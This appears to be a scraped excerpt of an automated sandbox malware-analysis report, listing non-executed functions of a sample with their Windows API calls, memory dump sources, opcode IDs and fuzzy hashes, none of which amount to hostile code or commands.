                                                                                                                                                                                                  Function 00007FF745023880 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF745024F7D,?,?,00000000,00007FF745029EEF,?,?,?,00007FF74501EB93,?,?,?,00007FF74501EA89), ref: 00007FF7450238BE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                  • Opcode ID: 47371f6cae0110cecbff56ef59c5b9581ff454716397a254fa36e45a8a85af86
                                                                                                                                                                                                  • Instruction ID: 0e14aa182c5e1370095d21a78702ee419c6d0277855dcbda04b254ee9f351643
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47371f6cae0110cecbff56ef59c5b9581ff454716397a254fa36e45a8a85af86
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44F05E18F0C707C1FA19367158402B5D2805F44FA0FCC0A30ED2E89AE1EF3CA8814232

                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                  Function 00007FF7450291A4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 231COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: NameTranslate$CodeInfoLocalePageValid_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                  • API String ID: 2487361160-905460609
                                                                                                                                                                                                  • Opcode ID: 2ee1d30cd41817c388ae3ac86c437be0dd8e4058d26dd38013e33c805d498f74
                                                                                                                                                                                                  • Instruction ID: 4d5ca62fecbe0b56dad7b62ee8bd1ef2ce8204ec30a5587763378dccdeb13a98
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ee1d30cd41817c388ae3ac86c437be0dd8e4058d26dd38013e33c805d498f74
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D891BE3AA0C742C5EB60BB32E4416BAB3A4AF44F84F844435EE4C477A5DF3DE9958720
                                                                                                                                                                                                  Function 00007FF7450143FC Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                  • Opcode ID: 5548b70b0cefbcb525ec7d57d70cede4d447af0874bcaf95fc99744e299bb412
                                                                                                                                                                                                  • Instruction ID: c3b91b2612f8d1b4b27bc25835264bf44ea7965931a8403f7b9db21ecc1a92f0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5548b70b0cefbcb525ec7d57d70cede4d447af0874bcaf95fc99744e299bb412
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A311076609B81C6EB60AF60E8807E9B364FB84B44F844439DA4D47BA5EF38D549C721
                                                                                                                                                                                                  Function 00007FF745029C04 Relevance: 9.2, APIs: 6, Instructions: 171COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Locale$InfoValid$CodeDefaultEnumLocalesPageSystemUser
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3082464267-0
                                                                                                                                                                                                  • Opcode ID: 3b7b7fe1348dda5d41963e03bf331e2e736922213e052ca7d769a36cffe0b59d
                                                                                                                                                                                                  • Instruction ID: 541949101cc01a3b59413a03931695e471b9346903411ee52fe823d228091d07
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b7b7fe1348dda5d41963e03bf331e2e736922213e052ca7d769a36cffe0b59d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF714F3AB0CA12C5FB10BF71E4516B8A3A4BF44F84F844835EA1D576A5DF3CA885C360
                                                                                                                                                                                                  Function 00007FF74501AD2C Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                  • Opcode ID: e2e9e4b08d55766f8489bd1342bb1899f8a505dc099b901336b236e5157fd6eb
                                                                                                                                                                                                  • Instruction ID: cadbdf65bf217efdafe2c5a1faf2337ec1ee8062ead79ff9df303fbf7d37a0ca
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2e9e4b08d55766f8489bd1342bb1899f8a505dc099b901336b236e5157fd6eb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81415036618B81C6E760EF35E8403AEB3A0FB88B54F940135EA8D46B69EF3CC555CB51
                                                                                                                                                                                                  Function 00007FF745029A0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                  • Opcode ID: 7f30fb09b69d25d80df610dc42c677b4d0e608a82631f03b09630da2202ead5f
                                                                                                                                                                                                  • Instruction ID: 32dbda0138d9bf807c17055285048b807fb2f03e041c09d34b3f6602b3cfce4c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f30fb09b69d25d80df610dc42c677b4d0e608a82631f03b09630da2202ead5f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23115E29A1C743C2FA64BB72A54157AE360BF44F84F944431FA4A43A64DE3CEC81C7A0
                                                                                                                                                                                                  Function 00007FF745025E64 Relevance: 7.8, APIs: 5, Instructions: 286COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                                                                                  • Opcode ID: 8e1a088be03459684d0f0f3b5b9979803e187604e760a331b36d960168fcf845
                                                                                                                                                                                                  • Instruction ID: 809f44a4963a1686482525b518756739db18f6b0a648f63be0f34bc9914eb957
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e1a088be03459684d0f0f3b5b9979803e187604e760a331b36d960168fcf845
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CB1A12AB1C692C1EE61BB7299101BAE351EB45FE4F884131FA5D07BE5DE3CE845C710
                                                                                                                                                                                                  Function 00007FF74500D1B0 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 706COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 0$nan
                                                                                                                                                                                                  • API String ID: 0-3707144033
                                                                                                                                                                                                  • Opcode ID: 4b45e8a6c8fc4174b96e92b2f6d83c7ba88e91b89e811e88f7c488d3e01b1d85
                                                                                                                                                                                                  • Instruction ID: 6592beb32b563aa01cbb45dba52165eba2b81c683b064123f892602c3f7fa163
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b45e8a6c8fc4174b96e92b2f6d83c7ba88e91b89e811e88f7c488d3e01b1d85
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD62A077A0CB84D6DB55AF35E4402ADB7A1FB85F98F848122EA4E03769DF38D495C320
                                                                                                                                                                                                  Function 00007FF7450142F0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                  • Opcode ID: fa008ab895573d51d9081d887bb3cab71e3d139b52afd8f7115241f48b5f998f
                                                                                                                                                                                                  • Instruction ID: edc13c4d63b44f0122f854025ae2535603fc9dd92f1b8a46b56608512f3180e3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa008ab895573d51d9081d887bb3cab71e3d139b52afd8f7115241f48b5f998f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB113A26B18B058AEB00AB60EC442B873A4FB19B58F841E31EA2D427A4DF38D5A5C350
                                                                                                                                                                                                  Function 00007FF74500DBF0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 539COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: nan
                                                                                                                                                                                                  • API String ID: 0-1810114945
                                                                                                                                                                                                  • Opcode ID: e8502167176aeb9d0e248a3ec3a0e9207b2ab05224c00187d2013f3dcd0dd0e9
                                                                                                                                                                                                  • Instruction ID: f68ff09dcf9a3461b8f145367a059e0e69ba739be774174c7192dd9a91aa7f0f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8502167176aeb9d0e248a3ec3a0e9207b2ab05224c00187d2013f3dcd0dd0e9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D22B367A0CB81CAEB11AF34E4402ADBBA1FB55F98F845136EA4D137A9DF38D481C710
                                                                                                                                                                                                  Function 00007FF745029670 Relevance: 4.7, APIs: 3, Instructions: 165COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale$_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4006003004-0
                                                                                                                                                                                                  • Opcode ID: 7a38986db6fc031485005f62dd7922395e7b5c1424c95a463608234a198f8097
                                                                                                                                                                                                  • Instruction ID: c0d5ba0691d9a6807e1c15b4465b07accd761e0242fb7b05a326e146fa4e6b87
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a38986db6fc031485005f62dd7922395e7b5c1424c95a463608234a198f8097
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C61A236A0C646C6EB34BF21E5402B9B3A1FB44B44F848535EB4E836A1DF3CE891C760
                                                                                                                                                                                                  Function 00007FF745021C04 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                                                                                                                  • Opcode ID: 832a604b1a41229109e05dfb92869448020b665d7aa22cd57a86631ae36c8e6b
                                                                                                                                                                                                  • Instruction ID: b55b61f75d6c3bafa023f9bb50777253fb4153aa1cd310ce4e7cb64ca45063a9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 832a604b1a41229109e05dfb92869448020b665d7aa22cd57a86631ae36c8e6b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0014428B0CB82C5EA14BB76A5404A5E754AF95FE4FD84535EE1C037F5DE3CE9018750
                                                                                                                                                                                                  Function 00007FF74500A2C0 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00007FF74500A4C5
                                                                                                                                                                                                  • 00000000, xrefs: 00007FF74500A4BB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 00000000$00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
                                                                                                                                                                                                  • API String ID: 0-756571863
                                                                                                                                                                                                  • Opcode ID: 3fc68c8767bf21b719d89b2e29557f87ec27f29f12cf8b11f6c0bd073e871569
                                                                                                                                                                                                  • Instruction ID: 5e504044c5b01f2e1749b1d58b0535bc81dbff6c716368070d2302d2a6a443ee
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fc68c8767bf21b719d89b2e29557f87ec27f29f12cf8b11f6c0bd073e871569
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E961223AB2C681C3E768AF38A458379A694F784F40FD09235DE4E87BA1DA3DE541C711
                                                                                                                                                                                                  Function 00007FF7450020E0 Relevance: 1.9, Strings: 1, Instructions: 652COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                                  • API String ID: 0-1553575800
                                                                                                                                                                                                  • Opcode ID: 311103c466259598d15c6ab42dcb7f8e48c0ec25a9ef83c99be89551d795f701
                                                                                                                                                                                                  • Instruction ID: 939d0d7d3172f9a292c717c57df8299c0c1e442a1f96119825861bcbbd441e99
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 311103c466259598d15c6ab42dcb7f8e48c0ec25a9ef83c99be89551d795f701
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD32262AF1C397C6EB64AA29F45077DA695FB94F84F904135DE4E43BA0DA3CE8418B10
                                                                                                                                                                                                  Function 00007FF74501B90C Relevance: 1.9, APIs: 1, Instructions: 373COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1807457897-0
                                                                                                                                                                                                  • Opcode ID: 572f9b0e94482cb6d983206236bd7bbbd00f97cbc9c8b69f5d78b5d6dc24e454
                                                                                                                                                                                                  • Instruction ID: 7b489d6745b1f1ebdfa198150a2cb1cdcfc09111f64265468b02de0d4de0a96b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 572f9b0e94482cb6d983206236bd7bbbd00f97cbc9c8b69f5d78b5d6dc24e454
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2502C126A0C7C1C6E711EF3894412F9B3A4FB58B48F859235EB9C83662EF39E595C700
                                                                                                                                                                                                  Function 00007FF7450276B0 Relevance: 1.8, APIs: 1, Instructions: 337COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c7751e7a25317033f419d3af6ad69e142abb1735c04488ff2bb8778ebc3600fe
